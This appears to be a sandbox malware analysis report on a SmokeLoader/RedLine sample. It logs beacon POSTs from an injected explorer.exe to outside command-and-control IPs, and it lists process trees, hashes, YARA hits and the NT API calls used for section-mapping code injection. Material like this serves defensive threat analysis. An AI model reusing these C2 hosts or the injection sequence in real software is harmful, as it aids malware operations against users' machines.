                                              Date: Tue, 23 Jul 2024 04:17:23 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              14 | 192.168.2.5 | 49746 | 107.173.160.137 | 443 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-23 04:17:23 UTC | 234 | OUT | POST / HTTP/1.1
                                              Host: 107.173.160.137
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1267
                                              2024-07-23 04:17:25 UTC | 137 | IN | HTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:17:25 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              15 | 192.168.2.5 | 49747 | 107.173.160.139 | 443 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-23 04:17:25 UTC | 234 | OUT | POST / HTTP/1.1
                                              Host: 107.173.160.139
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1267
                                              2024-07-23 04:17:27 UTC | 137 | IN | HTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:17:27 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              16 | 192.168.2.5 | 49748 | 167.235.128.153 | 443 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-23 04:18:45 UTC | 234 | OUT | POST / HTTP/1.1
                                              Host: 167.235.128.153
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1122
                                              2024-07-23 04:18:46 UTC | 137 | IN | HTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:18:46 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              17 | 192.168.2.5 | 49761 | 107.173.160.137 | 443 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-23 04:18:47 UTC | 234 | OUT | POST / HTTP/1.1
                                              Host: 107.173.160.137
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1267
                                              2024-07-23 04:18:48 UTC | 137 | IN | HTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:18:48 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              18 | 192.168.2.5 | 49762 | 107.173.160.139 | 443 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-23 04:18:49 UTC | 234 | OUT | POST / HTTP/1.1
                                              Host: 107.173.160.139
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1267
                                              2024-07-23 04:18:51 UTC | 137 | IN | HTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:18:50 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              19 | 192.168.2.5 | 49764 | 167.235.128.153 | 443 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-23 04:18:52 UTC | 234 | OUT | POST / HTTP/1.1
                                              Host: 167.235.128.153
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1122
                                              2024-07-23 04:18:53 UTC | 137 | IN | HTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:18:53 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              20 | 192.168.2.5 | 49765 | 107.173.160.137 | 443 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-23 04:18:54 UTC | 234 | OUT | POST / HTTP/1.1
                                              Host: 107.173.160.137
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1122
                                              Timestamp: 2024-07-23 04:18:55 UTC, Bytes transferred: 137, Direction: IN, Data:
                                              HTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:18:55 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close
                                              Timestamp: 2024-07-23 04:18:55 UTC, Bytes transferred: 685, Direction: IN, Data: response body


                                              Session ID: 21, Source IP: 192.168.2.5, Source Port: 49766, Destination IP: 107.173.160.139, Destination Port: 443, PID: 1028, Process: C:\Windows\explorer.exe
                                              Timestamp: 2024-07-23 04:18:56 UTC, Bytes transferred: 234, Direction: OUT, Data:
                                              POST / HTTP/1.1
                                              Host: 107.173.160.139
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1122
                                              Timestamp: 2024-07-23 04:18:56 UTC, Bytes transferred: 1122, Direction: OUT, Data: request body



                                              Target ID:0
                                              Start time:00:14:53
                                              Start date:23/07/2024
                                              Path:C:\Users\user\Desktop\file.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                              Imagebase:0x400000
                                              File size:155'648 bytes
                                              MD5 hash:D76C718ADA43477786EF9CA3BBA29842
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2121442892.0000000000846000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2121068064.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2121068064.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2121025538.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2121164273.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2121164273.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:low
                                              Has exited:true

                                              Target ID:2
                                              Start time:00:15:04
                                              Start date:23/07/2024
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0x7ff674740000
                                              File size:5'141'208 bytes
                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:4
                                              Start time:00:15:24
                                              Start date:23/07/2024
                                              Path:C:\Users\user\AppData\Roaming\ajjwvsd
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\ajjwvsd
                                              Imagebase:0x400000
                                              File size:155'648 bytes
                                              MD5 hash:D76C718ADA43477786EF9CA3BBA29842
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2409729283.00000000021B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2409729283.00000000021B1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2409361808.0000000000467000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2409488950.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2409488950.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.2409462213.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 39%, ReversingLabs
                                              • Detection: 41%, Virustotal, Browse
                                              Reputation:low
                                              Has exited:true

                                              Target ID:7
                                              Start time:00:16:16
                                              Start date:23/07/2024
                                              Path:C:\Users\user\AppData\Local\Temp\C9F5.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Users\user\AppData\Local\Temp\C9F5.exe
                                              Imagebase:0x7ff7d5060000
                                              File size:988'672 bytes
                                              MD5 hash:2B3ECC21382E825D6FE0812A717717EB
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low
                                              Has exited:true

                                              Target ID:8
                                              Start time:00:16:16
                                              Start date:23/07/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:9
                                              Start time:00:17:39
                                              Start date:23/07/2024
                                              Path:C:\Users\user\AppData\Local\Temp\C9F5.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\AppData\Local\Temp\C9F5.exe"
                                              Imagebase:0x7ff7d5060000
                                              File size:988'672 bytes
                                              MD5 hash:2B3ECC21382E825D6FE0812A717717EB
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:10
                                              Start time:00:17:40
                                              Start date:23/07/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:11
                                              Start time:00:17:48
                                              Start date:23/07/2024
                                              Path:C:\Users\user\AppData\Local\Temp\C9F5.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\AppData\Local\Temp\C9F5.exe"
                                              Imagebase:0x7ff7d5060000
                                              File size:988'672 bytes
                                              MD5 hash:2B3ECC21382E825D6FE0812A717717EB
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:12
                                              Start time:00:17:48
                                              Start date:23/07/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true


                                                Execution Graph

                                                Execution Coverage:8.8%
                                                Dynamic/Decrypted Code Coverage:21.6%
                                                Signature Coverage:51.5%
                                                Total number of Nodes:134
                                                Total number of Limit Nodes:5

                                                Control-flow Graph

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120635502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectView
                                                • String ID:
                                                • API String ID: 1652636561-0
                                                • Opcode ID: 5edb7204c22a8cfb94061bf161a88c3eca98da374ec15d8cd8ba2bf42dcd3747
                                                • Instruction ID: 8e4940cc2d5d294876689a6a874cb0cc3c399929e81e9dec1e5d288c8cd9e9dd
                                                • Opcode Fuzzy Hash: 5edb7204c22a8cfb94061bf161a88c3eca98da374ec15d8cd8ba2bf42dcd3747
                                                • Instruction Fuzzy Hash: F481B375500244BBEB209F91CC44FAB7BB8FF85704F10412AF952BA2F1E7749901CB69

                                                Control-flow Graph

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120635502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 4af5c640631db37ac51d1c1afd1ab74928840835cbc445bb96c3204467379d38
                                                • Instruction ID: 71a4d0092025beca94809e07d65936591d52f1bb8effc294688e3fcd05e54c36
                                                • Opcode Fuzzy Hash: 4af5c640631db37ac51d1c1afd1ab74928840835cbc445bb96c3204467379d38
                                                • Instruction Fuzzy Hash: E0615171900204FBEB209F95CC89FAF7BB8FF85700F10412AF912BA2E5D6759905DB65

                                                Control-flow Graph

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120635502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectView
                                                • String ID:
                                                • API String ID: 1652636561-0
                                                • Opcode ID: c3f6308678fe624b1287adcb7156a2cf5c07ee8b7810a15753646c5694e98bc6
                                                • Instruction ID: 6a824664258ffec6fdf95c516407446232c8a84219ad61b9fd4b8efeb52f3576
                                                • Opcode Fuzzy Hash: c3f6308678fe624b1287adcb7156a2cf5c07ee8b7810a15753646c5694e98bc6
                                                • Instruction Fuzzy Hash: 9B615C75900245BFEB219F91CC88FEBBBB8FF85710F10016AF951BA2A5E7749901CB24

                                                Control-flow Graph

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120635502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: f4faf4f0efc4cc5c307795d20c298965336779ff7452863f8b2b81be2522acaa
                                                • Instruction ID: 1fc6fb52bb36dddf8f971a96ecfe927bdbae9887f6286775c14151e9c1d92244
                                                • Opcode Fuzzy Hash: f4faf4f0efc4cc5c307795d20c298965336779ff7452863f8b2b81be2522acaa
                                                • Instruction Fuzzy Hash: 13512B71900245BBEB209F91CC88FAF7BB8EF85B00F14416AF912BA2E5D6749945CB64

                                                Control-flow Graph

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120635502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 40d7219ce39e026dd98d18ec02294656054e4da488103e740ba1602fb3a5db7c
                                                • Instruction ID: d88667ffe02cbbb2798d41d5ad0cf6527765788d972b82ac88077c7d238bff09
                                                • Opcode Fuzzy Hash: 40d7219ce39e026dd98d18ec02294656054e4da488103e740ba1602fb3a5db7c
                                                • Instruction Fuzzy Hash: 54511A71900205BFEF209F91CC89FAFBBB8FF85B10F104259F911AA2A5D7759941CB64

                                                Control-flow Graph

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120635502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 44bf211d5ecd49b3cfb3996dc98baa0f9fc545abe5e070ef87effc0df1f686f8
                                                • Instruction ID: 7169477154cf1621f4f222e223ad54e678f31395e99d0ffd613e12cb64d905d3
                                                • Opcode Fuzzy Hash: 44bf211d5ecd49b3cfb3996dc98baa0f9fc545abe5e070ef87effc0df1f686f8
                                                • Instruction Fuzzy Hash: 2B511A75900245BBEF209F91CC88FEF7BB8FF85B10F104119F911BA2A5D6759941CB64

                                                Control-flow Graph

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120635502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: c4110b1088d5ef41785dfe7ea8eaa09ab46741a105747cbb29c974859abd6495
                                                • Instruction ID: 14f4b29c405daff92d21e2b3eea283823ae405efc36948ac0d92101f557811aa
                                                • Opcode Fuzzy Hash: c4110b1088d5ef41785dfe7ea8eaa09ab46741a105747cbb29c974859abd6495
                                                • Instruction Fuzzy Hash: DE51F9B5900245BBEF209F91CC88FEFBBB8FF85B10F104259F911AA2A5D6709944CB64

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120635502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: CreateProcessTerminateThreadUser
                                                • String ID:
                                                • API String ID: 1921587553-0
                                                • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                • Instruction ID: 3e1675bac70c022a4e457ffe6b5fa54937b73e0116388ba90aec32851b4d9964
                                                • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                • Instruction Fuzzy Hash: A1412431228E088FD768EF5CA885762B7D5F798311F6643AAE809D7389EA34DC1183C5

                                                Control-flow Graph

                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00849AB7
                                                • Module32First.KERNEL32(00000000,00000224), ref: 00849AD7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2121442892.0000000000846000.00000040.00000020.00020000.00000000.sdmp, Offset: 00846000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_846000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 3833638111-0
                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                • Instruction ID: 49a69dca407ef4f7db63fca89377f5ecc6a57d7f32353e116607f76b8eb50db3
                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                • Instruction Fuzzy Hash: ECF062321007286FD7307AF9AD8DB6F76E8FF49724F140528E686D60C0DA70EC454661

                                                Control-flow Graph

                                                APIs
                                                • InterlockedDecrement.KERNEL32(?), ref: 00417CD8
                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,?,00000000), ref: 00417CEF
                                                • GetAtomNameW.KERNEL32(00000000,00000000,00000000), ref: 00417CF8
                                                • AreFileApisANSI.KERNEL32 ref: 00417CFE
                                                • SetVolumeMountPointA.KERNEL32(00000000,00000000), ref: 00417D06
                                                • EnumDateFormatsW.KERNEL32(00000000,00000000,00000000), ref: 00417D0F
                                                • GetCommMask.KERNELBASE(00000000,00000000), ref: 00417D3F
                                                • GetLastError.KERNEL32 ref: 00417D45
                                                • ZombifyActCtx.KERNEL32(00000000), ref: 00417D58
                                                • GetConsoleAliasesW.KERNEL32(?,00000000,00000000), ref: 00417D67
                                                • OpenWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 00417D8C
                                                • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 00417D95
                                                  • Part of subcall function 004179AD: LocalAlloc.KERNELBASE(00000000,00417DE5), ref: 004179B5
                                                • LoadLibraryA.KERNELBASE(004193D8), ref: 00417E38
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120667352.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                Similarity
                                                • API ID: ConsoleTimerWaitable$AliasesAllocApisAtomCommCreateDateDecrementEnumErrorFileFormatsInterlockedLastLibraryLoadLocalMaskMountNameOpenPointVolumeWriteZombify
                                                • String ID: tl_$}$
                                                • API String ID: 1277400812-2845185508
                                                • Opcode ID: 51d45e83e475c99cd7aa5bd50a4591079eb361b0ed041a489ec9c850fbcfa93b
                                                • Instruction ID: 05c418657806d1e3c5604e16026e84f417cc0deeb5e126f930ec35500030948a
                                                • Opcode Fuzzy Hash: 51d45e83e475c99cd7aa5bd50a4591079eb361b0ed041a489ec9c850fbcfa93b
                                                • Instruction Fuzzy Hash: 2F51C4705051289BC721AB21ED499DF3BB8EF09354B11847EF105E2161DB3C4DC6CBAD

                                                Control-flow Graph

                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005B024D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2121025538.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5b0000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID: cess$kernel32.dll
                                                • API String ID: 4275171209-1230238691
                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                • Instruction ID: 7551dfa21bb43cba0658288d1fd6cf974fef82f8ba6c86bf0450c771147d3be8
                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                • Instruction Fuzzy Hash: 4F526874A00229DFDB64CF58C985BADBBB1BF09304F1480D9E94DAB291DB30AE85DF14

                                                Control-flow Graph

                                                APIs
                                                • SetErrorMode.KERNELBASE(00000400,?,?,005B0223,?,?), ref: 005B0E19
